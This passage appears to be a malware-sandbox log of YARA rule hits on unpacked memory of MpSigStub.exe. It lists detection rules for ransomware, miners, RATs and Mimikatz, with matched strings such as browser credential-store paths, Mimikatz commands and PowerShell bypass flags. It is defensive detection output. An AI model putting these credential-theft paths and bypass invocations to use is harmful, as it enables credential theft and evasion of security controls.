\..\..\src\phobos\std\stdio.d 0xc1240:$dlang11: Unexpected '\n' when converting from type const(char)[] to type int 0xd25e:$e0: ,0, 0xc1288:$e0: ,0, 0xc128a:$e1: ,1, 0xc128c:$e2: ,2, 0xc128e:$e3: ,3,
35.3.MpSigStub.exe.28bd6697177.158.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x1d6fb:$s1: 7ZSfx%03x.cmd 0x17060:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x17ca8:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x18854:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x19444:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1a054:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x9e5d4:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xc3cb3:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xc60e7:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe5c8b:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe8303:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
35.3.MpSigStub.exe.28bd6697177.158.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xaf1e0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xaf20e:$b1: logKext Password: 0xaf223:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xaf1e0:$c1: logKextPassKey
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x48d67:$sa1: -ENC 0xc360:$sc2: -noprofile 0xc623:$sc2: -noprofile 0xf92bf:$sc2: -noprofile 0xc372:$sd2: -noninteractive 0xc635:$sd2: -noninteractive 0xf92d1:$sd2: -noninteractive 0x477e9:$se1: -EP bypass 0x48d4f:$se3: -ExecutionPolicy BypasS
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x4dbcb:$: Decrypt.txt
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0xb74bd:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	HackTool_Samples	Hacktool	unknown	0x6bfc1:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0xb74bd:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0xb7e2d:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0xb7e2d:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	CredentialStealer_Generic_Backdoor	Detects credential stealer byed on many strings that indicate password store access	Florian Roth	0x7767:$s4: select * from moz_logins 0x7926:$s4: select * from moz_logins 0x7bcb:$s4: select * from moz_logins 0x7b6e:$s5: %s\Google\Chrome\User Data\Default\Login Data 0x7b9f:$s9: %s\Chromium\User Data\Default\Login Data 0x7c33:$s10: %s\Opera\Opera\profile\wand.dat
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x77a1f:$e6: exe.dmc 0x37720:$r2: nuR\noisreVtnerruC 0x71981:$r2: nuR\noisreVtnerruC
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x6ccae:$: Neo,welcome to the desert of real.
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xaf1e0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xaf20e:$b1: logKext Password: 0xaf223:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xaf1e0:$c1: logKextPassKey
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x48d67:$sa1: -ENC 0xc360:$sc2: -noprofile 0xc623:$sc2: -noprofile 0xf92bf:$sc2: -noprofile 0xc372:$sd2: -noninteractive 0xc635:$sd2: -noninteractive 0xf92d1:$sd2: -noninteractive 0x477e9:$se1: -EP bypass 0x48d4f:$se3: -ExecutionPolicy BypasS
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c283a.76.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c283a.76.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c283a.76.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c283a.76.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd745f702.85.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x49c2c:$x4: Http/1.1 403 Forbidden 0x49c2c:$s5: Http/1.1 403 Forbidden
35.3.MpSigStub.exe.28bd745f702.85.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x52522:$i4: AssecorPetaerC
35.3.MpSigStub.exe.28bd745f702.85.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.172.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.172.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.172.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.172.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c283a.171.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c283a.171.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c283a.171.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c283a.171.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	SUSP_XMRIG_String	Detects a suspicious XMRIG crypto miner executable string in filr	Florian Roth	0x73df:$x1: xmrig.exe
35.3.MpSigStub.exe.28bd77beebe.15.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x8410c:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd77beebe.15.unpack	HackTool_Samples	Hacktool	unknown	0x38c10:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
35.3.MpSigStub.exe.28bd77beebe.15.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x8410c:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd77beebe.15.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xfbcf8:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xfbbd5:$rat2: rat.(Core).generateBeacon 0xfbbf2:$rat3: rat.gJitter 0xfbc00:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xfbc66:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xfbcce:$rat8: rat/modules/netsweeper.(Pinger).listen 0xfbcf8:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xfbd26:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xfbbac:$winblows: rat/platforms/win.(winblows).GetStage
35.3.MpSigStub.exe.28bd77beebe.15.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x84a7c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd77beebe.15.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x84a7c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd77beebe.15.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x4466e:$e6: exe.dmc 0x3e5d0:$r2: nuR\noisreVtnerruC
35.3.MpSigStub.exe.28bd77beebe.15.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
35.3.MpSigStub.exe.28bd77beebe.15.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x398fd:$: Neo,welcome to the desert of real.
35.3.MpSigStub.exe.28bd6694af5.157.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xc3a9a:$a: Cookies: Sym1.0 0xc3a3b:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
35.3.MpSigStub.exe.28bd6694af5.157.unpack	APT_Backdoor_Win_DShell_3	This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell	FireEye	0xc3707:$dlang1: C:\D\dmd2\windows\bin\..\..\src\phobos\std\utf.d 0xc373c:$dlang2: C:\D\dmd2\windows\bin\..\..\src\phobos\std\file.d 0xc3772:$dlang3: C:\D\dmd2\windows\bin\..\..\src\phobos\std\format.d 0xc37aa:$dlang4: C:\D\dmd2\windows\bin\..\..\src\phobos\std\base64.d 0xc37e2:$dlang5: C:\D\dmd2\windows\bin\..\..\src\phobos\std\stdio.d 0xc371c:$dlang6: \..\..\src\phobos\std\utf.d 0xc3819:$dlang6: \..\..\src\phobos\std\utf.d 0xc3751:$dlang7: \..\..\src\phobos\std\file.d 0xc3839:$dlang7: \..\..\src\phobos\std\file.d 0xc3787:$dlang8: \..\..\src\phobos\std\format.d 0xc385a:$dlang8: \..\..\src\phobos\std\format.d 0xc37bf:$dlang9: \..\..\src\phobos\std\base64.d 0xc387d:$dlang9: \..\..\src\phobos\std\base64.d 0xc37f7:$dlang10: \..\..\src\phobos\std\stdio.d 0xc38a0:$dlang10: \..\..\src\phobos\std\stdio.d 0xc38c2:$dlang11: Unexpected '\n' when converting from type const(char)[] to type int 0xf8e0:$e0: ,0, 0xc390a:$e0: ,0, 0xc390c:$e1: ,1, 0xc390e:$e2: ,2, 0xc3910:$e3: ,3,
35.3.MpSigStub.exe.28bd6694af5.157.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x1fd7d:$s1: 7ZSfx%03x.cmd 0x196e2:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1a32a:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1aed6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1bac6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1c6d6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xa0c56:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xc6335:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xc8769:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe830d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xea985:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
35.3.MpSigStub.exe.28bd6694af5.157.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.75.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.75.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.75.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
35.3.MpSigStub.exe.28bd62c2d87.75.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	SUSP_XMRIG_String	Detects a suspicious XMRIG crypto miner executable string in filr	Florian Roth	0x73df:$x1: xmrig.exe
35.3.MpSigStub.exe.28bd77beebe.25.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x8410c:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd77beebe.25.unpack	HackTool_Samples	Hacktool	unknown	0x38c10:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
35.3.MpSigStub.exe.28bd77beebe.25.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x8410c:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd77beebe.25.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xfbcf8:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xfbbd5:$rat2: rat.(Core).generateBeacon 0xfbbf2:$rat3: rat.gJitter 0xfbc00:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xfbc66:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xfbcce:$rat8: rat/modules/netsweeper.(Pinger).listen 0xfbcf8:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xfbd26:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xfbbac:$winblows: rat/platforms/win.(winblows).GetStage
35.3.MpSigStub.exe.28bd77beebe.25.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x84a7c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd77beebe.25.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x84a7c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd77beebe.25.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x4466e:$e6: exe.dmc 0x3e5d0:$r2: nuR\noisreVtnerruC
35.3.MpSigStub.exe.28bd77beebe.25.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
35.3.MpSigStub.exe.28bd77beebe.25.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x398fd:$: Neo,welcome to the desert of real.
35.3.MpSigStub.exe.28bd780418a.26.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x3f8a7f:$xs1: WS2_32.dll 0x1772b0:$xs2: ReflectiveLoader 0x292da9:$xs2: ReflectiveLoader
35.3.MpSigStub.exe.28bd780418a.26.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x1772b0:$x1: ReflectiveLoader 0x292da9:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd780418a.26.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x36726c:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
35.3.MpSigStub.exe.28bd780418a.26.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x3ee40:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd780418a.26.unpack	Amplia_Security_Tool	Amplia Security Tool	unknown	0xf122e:$a: Amplia Security 0xf12fb:$e: extract the TGT session key
35.3.MpSigStub.exe.28bd780418a.26.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x353ec8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x353f23:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35426f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3542ca:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x356571:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
35.3.MpSigStub.exe.28bd780418a.26.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x364a02:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x364a24:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
35.3.MpSigStub.exe.28bd780418a.26.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x3ee40:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd780418a.26.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2bcfe6:$s2: sekurlsa::wdigest 0x2bcf17:$s6: sekurlsa::livessp 0x2bcf5c:$s9: sekurlsa::process 0x2bcfa1:$s12: sekurlsa::tickets 0x2bced2:$s15: sekurlsa::credman
35.3.MpSigStub.exe.28bd780418a.26.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x418d72:$1: comms.BeaconData 0x418d87:$2: comms.CommandResponse 0x418da1:$3: rat.BaseChannel 0x418db5:$4: rat.Config 0x418dc4:$5: rat.Core 0x418dd1:$6: platforms.AgentPlatform 0x418ded:$7: GetHostID 0x418dfb:$8: /rat/cmd/gorat_shared/dllmain.go
35.3.MpSigStub.exe.28bd780418a.26.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xb6a2c:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xb6909:$rat2: rat.(Core).generateBeacon 0xb6926:$rat3: rat.gJitter 0xb6934:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xb699a:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xb6a02:$rat8: rat/modules/netsweeper.(Pinger).listen 0xb6a2c:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xb6a5a:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xb68e0:$winblows: rat/platforms/win.(winblows).GetStage
35.3.MpSigStub.exe.28bd780418a.26.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x3f7b0:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd780418a.26.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x49b421:$one6: Shell Environ$("COMSPEC") & " /c 0x49b4e8:$one6: Shell Environ$("COMSPEC") & " /c 0x49ba6b:$one6: Shell Environ$("COMSPEC") & " /c 0x49ba8c:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x49ba1e:$two5: NullRefrencedException 0x49ba36:$two6: error has occurred in user32.dll by 0x49ba1e:$two7: NullRefrencedException
35.3.MpSigStub.exe.28bd780418a.26.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x1910b7:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
